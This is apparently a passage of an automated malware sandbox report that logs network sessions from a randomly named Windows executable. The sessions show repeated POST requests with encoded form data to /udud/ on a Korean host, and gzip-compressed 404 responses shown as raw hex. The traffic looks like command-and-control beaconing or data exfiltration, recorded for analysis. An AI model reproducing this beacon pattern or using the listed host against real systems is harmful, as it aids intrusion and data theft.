                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:36:12.748137951 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
                                                                                                May 27, 2024 12:36:12.748218060 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:36:12.748516083 CEST1289INData Raw: 31 33 36 63 0d 0a c4 5d 6d 8f e3 b8 91 fe 9c fc 0a 62 1a 07 b4 e6 64 43 92 25 d9 ee c6 05 b7 3b 8b 04 fb e1 ee 80 4c f2 e9 32 18 c8 96 ec 16 c6 6d fb 64 bb 5f d6 e8 ff 7e 55 45 52 a2 28 4a a2 65 6f 32 3d fd 62 aa f8 14 59 2a b2 8a c5 a2 64 72 99
                                                                                                Data Ascii: 136c]mbdC%;L2md_~UER(Jeo2=bY*dr'z~Dxr^9T#.~f|JJoaLM=n9Ckjz!KNA7Xx9dmnr9j({b7W>>:47Ox)_`_sZTIw=
                                                                                                May 27, 2024 12:36:12.748660088 CEST1289INData Raw: 02 33 c9 82 ac 67 26 f7 f1 e4 ee a2 58 94 d5 a3 0e a6 1e 89 18 68 d3 d4 a4 69 ca 3b 89 21 45 c5 eb 6a f6 8e 82 2a fa 47 0e 12 86 61 19 d4 e0 01 96 da a8 7c 54 d3 7b 29 cc 05 46 bd b6 35 2e 76 cf cb 55 14 5c 67 c1 04 b7 0e 43 c3 fe 18 b1 c6 d8 5a
                                                                                                Data Ascii: 3g&Xhi;!Ej*Ga|T{)F5.vU\gCZTlt=pA'lF_\IV@^mkm>/DBZbV@eIHNyC$A)9Xr,?U;EU>G<jbu]1+vaf[xwT7Zz`&+j(5Iy\
                                                                                                May 27, 2024 12:36:12.748682022 CEST1289INData Raw: 55 97 7d a5 e7 4c f0 42 7c ec 0d f6 92 ae 73 e8 2f b8 96 62 f4 e0 12 a0 a5 fe ff fd d7 c6 e7 af ef cf 8b dd 46 eb 07 46 b2 31 75 8e a6 13 bf 39 34 ca eb 81 87 39 73 db 7b 5f ea d5 cb ab ae 30 25 ed 44 d0 4a 1d 9c 74 d0 86 82 36 24 ca a8 83 32 12
                                                                                                Data Ascii: U}LB|s/bFF1u949s{_0%DJt6$2@u Mm<g<"xMe8hfD}glY#@?U?|o,Cg&1cgVw,Cp#uC,y_1mSdv7pnjr"W`"q
                                                                                                May 27, 2024 12:36:12.748797894 CEST1113INData Raw: 68 22 a3 d8 0e 89 13 b7 a3 d8 f6 4f 92 b7 23 d9 f6 4d 92 b7 23 85 97 21 85 ed 48 d1 65 48 91 49 33 c9 9e f5 9f 48 be 81 95 bb 86 89 b5 ed bb 86 49 bf 45 bc 06 dd ce 4e 5e c3 e1 72 eb 79 0d b7 ab 6c ea 0d 19 5b 5b da ab 78 0e b0 bf d7 f0 bb dc 2a
                                                                                                Data Ascii: h"O#M#!HeHI3HIEN^ryl[[x*_b[}-5Zn[{gp}Mxtk}=w!7Nn(!eWnMZ$"\\k1_c}L.-){|>5]\a
                                                                                                May 27, 2024 12:36:12.748876095 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:36:12.748940945 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:36:12.748955965 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:36:12.752213955 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                71192.168.11.3049901183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:15.124752998 CEST765OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 52 31 4a 2f 6c 6b 76 6f 6c 57 78 79 31 63 53 36 2b 4e 63 46 4d 52 6a 61 4d 67 59 76 62 6d 6d 44 71 52 36 42 5a 57 2b 72 6a 6f 53 30 62 58 34 74 46 37 6b 69 33 4a 4d 37 57 33 59 63 69 6f 55 77 58 4a 78 4d 64 67 32 31 62 34 54 49 70 76 55 75 6d 6b 53 76 47 6e 6d 31 77 34 70 46 73 57 4f 75 45 6a 35 50 6b 2f 62 59 71 2b 46 6e 43 4d 62 30 6b 75 49 65 67 72 78 50 45 53 2f 6c 30 39 69 79 34 61 6c 64 65 69 31 35 68 37 2b 75 32 43 7a 6d 4c 68 79 47 6f 7a 78 35 46 4b 56 42 6a 56 47 57 79 41 45 6d 4e 41 33 69 49 79 61 4e 33 32 45 4d 69 73 39 46 77 65 59 50 57 6a 43 33 54 66 73 53 63 59 4b 53 48 42 64 6b 38 44 61 4a 64 52 32 73 59 61 54 67 2b 63 41 3d
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxy1cS6+NcFMRjaMgYvbmmDqR6BZW+rjoS0bX4tF7ki3JM7W3YcioUwXJxMdg21b4TIpvUumkSvGnm1w4pFsWOuEj5Pk/bYq+FnCMb0kuIegrxPES/l09iy4aldei15h7+u2CzmLhyGozx5FKVBjVGWyAEmNA3iIyaN32EMis9FweYPWjC3TfsScYKSHBdk8DaJdR2sYaTg+cA=
                                                                                                May 27, 2024 12:36:15.585922956 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:36:15.585972071 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
                                                                                                May 27, 2024 12:36:15.586132050 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:36:15.586234093 CEST1289INData Raw: 31 33 36 63 0d 0a c4 5d 6d 8f e3 b8 91 fe 9c fc 0a 62 1a 07 b4 e6 64 43 92 25 d9 ee c6 05 b7 3b 8b 04 fb e1 ee 80 4c f2 e9 32 18 c8 96 ec 16 c6 6d fb 64 bb 5f d6 e8 ff 7e 55 45 52 a2 28 4a a2 65 6f 32 3d fd 62 aa f8 14 59 2a b2 8a c5 a2 64 72 99
                                                                                                Data Ascii: 136c]mbdC%;L2md_~UER(Jeo2=bY*dr'z~Dxr^9T#.~f|JJoaLM=n9Ckjz!KNA7Xx9dmnr9j({b7W>>:47Ox)_`_sZTIw=
                                                                                                May 27, 2024 12:36:15.586330891 CEST1289INData Raw: 02 33 c9 82 ac 67 26 f7 f1 e4 ee a2 58 94 d5 a3 0e a6 1e 89 18 68 d3 d4 a4 69 ca 3b 89 21 45 c5 eb 6a f6 8e 82 2a fa 47 0e 12 86 61 19 d4 e0 01 96 da a8 7c 54 d3 7b 29 cc 05 46 bd b6 35 2e 76 cf cb 55 14 5c 67 c1 04 b7 0e 43 c3 fe 18 b1 c6 d8 5a
                                                                                                Data Ascii: 3g&Xhi;!Ej*Ga|T{)F5.vU\gCZTlt=pA'lF_\IV@^mkm>/DBZbV@eIHNyC$A)9Xr,?U;EU>G<jbu]1+vaf[xwT7Zz`&+j(5Iy\
                                                                                                May 27, 2024 12:36:15.586464882 CEST1289INData Raw: 55 97 7d a5 e7 4c f0 42 7c ec 0d f6 92 ae 73 e8 2f b8 96 62 f4 e0 12 a0 a5 fe ff fd d7 c6 e7 af ef cf 8b dd 46 eb 07 46 b2 31 75 8e a6 13 bf 39 34 ca eb 81 87 39 73 db 7b 5f ea d5 cb ab ae 30 25 ed 44 d0 4a 1d 9c 74 d0 86 82 36 24 ca a8 83 32 12
                                                                                                Data Ascii: U}LB|s/bFF1u949s{_0%DJt6$2@u Mm<g<"xMe8hfD}glY#@?U?|o,Cg&1cgVw,Cp#uC,y_1mSdv7pnjr"W`"q
                                                                                                May 27, 2024 12:36:15.586519957 CEST1113INData Raw: 68 22 a3 d8 0e 89 13 b7 a3 d8 f6 4f 92 b7 23 d9 f6 4d 92 b7 23 85 97 21 85 ed 48 d1 65 48 91 49 33 c9 9e f5 9f 48 be 81 95 bb 86 89 b5 ed bb 86 49 bf 45 bc 06 dd ce 4e 5e c3 e1 72 eb 79 0d b7 ab 6c ea 0d 19 5b 5b da ab 78 0e b0 bf d7 f0 bb dc 2a
                                                                                                Data Ascii: h"O#M#!HeHI3HIEN^ryl[[x*_b[}-5Zn[{gp}Mxtk}=w!7Nn(!eWnMZ$"\\k1_c}L.-){|>5]\a
                                                                                                May 27, 2024 12:36:15.586628914 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:36:15.586716890 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:36:15.586728096 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:36:15.590257883 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                72192.168.11.3049902183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:17.939718962 CEST1682OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 52 31 4a 2f 6c 6b 76 6f 6c 57 78 79 31 63 53 36 2b 4e 63 46 4d 52 6a 61 4d 67 59 76 62 6d 6d 44 71 52 36 42 5a 57 2b 72 6a 6f 61 30 62 6b 41 74 45 63 77 69 32 4a 4d 37 56 33 59 64 69 6f 55 78 58 4a 59 46 64 67 71 36 62 36 72 49 6f 4e 63 75 6a 56 53 76 50 6e 6d 31 34 59 70 45 6f 57 4f 37 45 6a 4a 44 6b 2f 4c 59 71 2b 46 6e 43 4b 2f 30 7a 76 49 65 6d 72 78 4d 46 53 2f 68 69 39 69 57 34 61 74 6a 65 69 67 4f 67 4c 65 75 7a 53 6a 6d 4d 55 75 47 75 6a 78 2f 47 4b 55 55 6a 56 4b 4a 79 42 73 55 4e 44 72 49 49 79 69 4e 79 52 67 55 6d 4f 6f 54 78 50 4d 62 62 77 37 4c 64 38 42 48 43 49 36 50 4f 69 5a 56 37 51 37 34 5a 55 4f 36 48 72 4c 4c 70 34 37 33 7a 4e 72 69 45 61 72 4c 30 41 6e 72 7a 49 33 7a 37 32 43 61 34 46 4f 49 36 78 7a 63 38 67 52 49 69 48 67 6b 68 55 53 2f 6c 6a 39 37 63 4b 35 70 4a 6d 49 52 52 62 74 4c 6c 4e 38 37 74 53 67 4c 69 48 67 54 33 4d 71 79 71 71 54 34 6c 62 35 41 48 79 6f 42 53 79 44 56 62 70 55 57 37 33 2f 62 6d 36 33 59 74 79 42 2b 31 6f 66 76 49 34 78 43 44 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxy1cS6+NcFMRjaMgYvbmmDqR6BZW+rjoa0bkAtEcwi2JM7V3YdioUxXJYFdgq6b6rIoNcujVSvPnm14YpEoWO7EjJDk/LYq+FnCK/0zvIemrxMFS/hi9iW4atjeigOgLeuzSjmMUuGujx/GKUUjVKJyBsUNDrIIyiNyRgUmOoTxPMbbw7Ld8BHCI6POiZV7Q74ZUO6HrLLp473zNriEarL0AnrzI3z72Ca4FOI6xzc8gRIiHgkhUS/lj97cK5pJmIRRbtLlN87tSgLiHgT3MqyqqT4lb5AHyoBSyDVbpUW73/bm63YtyB+1ofvI4xCDo5UOkjNznP8+KOZVCC3uu2PaBAabWBQ5lV2NrUjAVAoLgAqYRmAl1ACuDY5IVyA2dMSOM/bPGFeABNrfgmJsWtm8f6qLL9xW42VJY+NTIbnbnwryxvmt+EFF1P4zSmyU3YdiKdjbtD4Wl8qYNSpOXjvXhn6Fuo9CUdfsypIJSi/AfZlO6yyKUCUvuB/tgxQ2aXKRPKOvS0NNMn1dHyTVewMi4Fahl+w51i1jpMXTUoDdjnujMV+/kVE1bk7NX//uRWxUVGe6fuGsq1FzFGkqGScc57OEUhjMCLIOTU39JKXFFH/DOP2PvHtScfjxD46v6Ky1hIMvZLQhNrQ+aJjmigdcOVc3Z54vXFfmpHvJ2aAVjDLO5bgvnbAzhc1zLNJx1Zw/YoGtMNPlPOkEqxJ2csks3wpFGi9C6OSAJnk/UlUZC+hEmW1uyXRWaEc5IjvD8kZ3llbwXozCFOzvuzwm7tE+rLTrUkPOnQFzUmQh2uTDvqA586Ykzba4vvjCezY8v5ukIaUQbddgzWJblUbyAFPLBE8djf+zXEpvFcEm1yod+vXrWft3pIWddsRfWsEu7znERa31ZNsNFQAgj4xs834uoQqesNJncBcou0gDrNmN2lcYRu8WT6sfa309iHoLQr/AT5DtMaGKiIqScpxsw9D9yCF/Xadk1c [TRUNCATED]
                                                                                                May 27, 2024 12:36:18.387840033 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:36:18.387890100 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
